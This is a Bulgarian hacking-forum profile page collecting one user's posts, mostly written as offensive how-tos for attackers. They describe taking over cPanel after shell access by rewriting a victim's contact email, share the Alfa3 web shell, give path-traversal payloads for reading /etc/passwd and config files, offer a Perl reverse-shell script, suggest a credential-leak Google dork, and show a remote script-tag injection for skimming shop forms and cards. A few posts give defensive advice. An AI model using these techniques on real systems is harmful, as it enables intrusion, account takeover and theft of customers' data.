Jump to content
¯\_( ツ)_/¯
  • TAD GROUP are currently hiring penetration testers. Please read the topic in Career Central subforum.
  • Sponsored Ad

TheZero

Members
  • Content Count

    41
  • Joined

  • Last visited

  • Days Won

    9

TheZero last won the day on May 11

TheZero had the most liked content!

Community Reputation

22 Excellent

Social Info

1 Follower

About TheZero

  • Rank
    Beginner

Recent Profile Visitors

657 profile views
  1. Това е английската версия на сайта https://www.hirehackerservices.com/
  2. Не обиждайте професионалните хакери, че да не вземат да хакнат хакер.бг за отмъщение! 🤣🤣
  3. Искам да ви обесня една малко позната тема. Както съм споменал в заглавието, как става пробивът в cpanel след шел достъп? Когато злонамереният хакерът иска да направи повече зулуми след като е качил шел в даден сайт, той може да поиска да получи още повече привилегии. Файлът /home/jertva/.contactemail се презаписва с нов мейл адрес. После се отива на забравена парола в saitjertva.com/cpanel, паролата се променя и от там вече се влиза в cpanel. Разбира се, някои хостинги са премахнали опцията - забравена парола и номерът не минава. Все пак при наличие на cpanel в 80% от случаите, методът си работи.
  4. Споделям, един от най-добрите шелове от колекцията ми - Alfa3 на ALFA TEAM ☣ (Iranian Hackers). Шелът съдържа всички необходими инструменти за един хакер. Интерфейсът е чудесен, елементарен за разбиране и лесен за навигиране. Смъкни
  5. Реших да пусна темата за eдна популярна уязвимост LFD (Local File Disclosure) или AFD (Arbitrary File Download). Методът се exploit-ва лесно. Аз предпочитам да гледам за улеснение направо през source кода, под формата на: view-source:http://site.com/?view=/../../../../../../../etc/passwd или view-source:http://site.com/download.php?file=/../../config.php По този начин могат да се разчетат критични данни и пароли на сървъра. За какво и как може да се възползва от това, зависи от намеренията и фантазията на хакера. Ужасно много сайтове страдат от тази слабост, включително и важни такива.
  6. Kогато имаме нужда от обратна връзка с отдалечения сървър и по никакав начин не успяваме, този script написан на Perl помога почти във всички случаи. Как се използва: command > perl IP Port Примерно: perl 127.0.0.1 1212 За целта трябва да имате отворен съответен порт. Смъкни!
  7. Хакерството си е хакерство. Няма значение дали е "етично" или "неетично", разлика няма. Youtube, разните security/hacking форуми, exploit сайтове са пълни с информация и уроци. Започни с нещо много елементарно! Търси в Google следното: filetype:txt intext:username password filetype ще рече - разширение на файла. intext e съдържанието Ще видиш колко много резултати ще излязат. Ти разбира се можеш да промениш търсенето. Успех!
  8. Ще бъда кратък и надявам се ясен. В един пробит сайт, хакерът може да постави javascript код и по този начин може да открадне всички въведени данни от дадена форма. Не е нужно да инжектира целият дълъг код, а просто да се извика от отдалечен сървър под формата на <script src="http://drug-website/gaden-script.js"></script> По този начин се правят сериозни зулуми. Един от най-лощите сценарии е вграждането на такъв код в интернет магазин и кредитни карти например. Ето и един сайт обесняващ с демо, как става самото крадене. http://www.stealmylogin.com/demo.html Има и други техники но на тях ще се спра може би в някоя друга тема.
  9. Проверете, дали са ви хакнали? Публикуваха списък на 7,695,066,389 хакнати акаунти. Това е световен рекорд от всички времена. На сайта https://haveibeenpwned.com/ може да проверите, дали и вашият e-mail адрес е компрометиран. Добре е, да си смените веднага паролите. На същият сайт има доста подробности около пробивите. Също така, може да се свали и списъка на паролите. https://haveibeenpwned.com/Passwords
  10. Колеги, добре е, че държите на българското, но защо не си прегледате никовете? Май и те не са български.
  11. Добре е да се отбележи, че reflected XSS се блокира от XSS AudItor-а под Google Chrome. Просто не работи. В този смисъл Chrome е полезен. Незнам и за актуален bypass в момента.
  12. Това, би трябвало да ти помогне: https://www.malwarebytes.com/mwb-download/
  13. Наистина гигантска база данни за MD5 hashes. https://hashkiller.co.uk/md5-decrypter.aspx
  14. Ако е така, както описваш, това е признак на шпионски софтуер. Използвай друго устройство за смяна на паролите, докато си изчистиш компютъра/телефона. cybercrime.bg няма да ти помогнат, за тях това са дреболии.
  15. Бях чел нещо подобно и за хиляди е-магазини натряскани с промени в javascript файловете. Защо ли не си мушкат злобните скриптове в server side файлове? Така поне остават - "невидими". Явно имат оправдателна причина. Попадал съм на шмекерии в php файлове за крадене на пресни данни, които пак препращат плячката навън. Големи изобретателности!
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.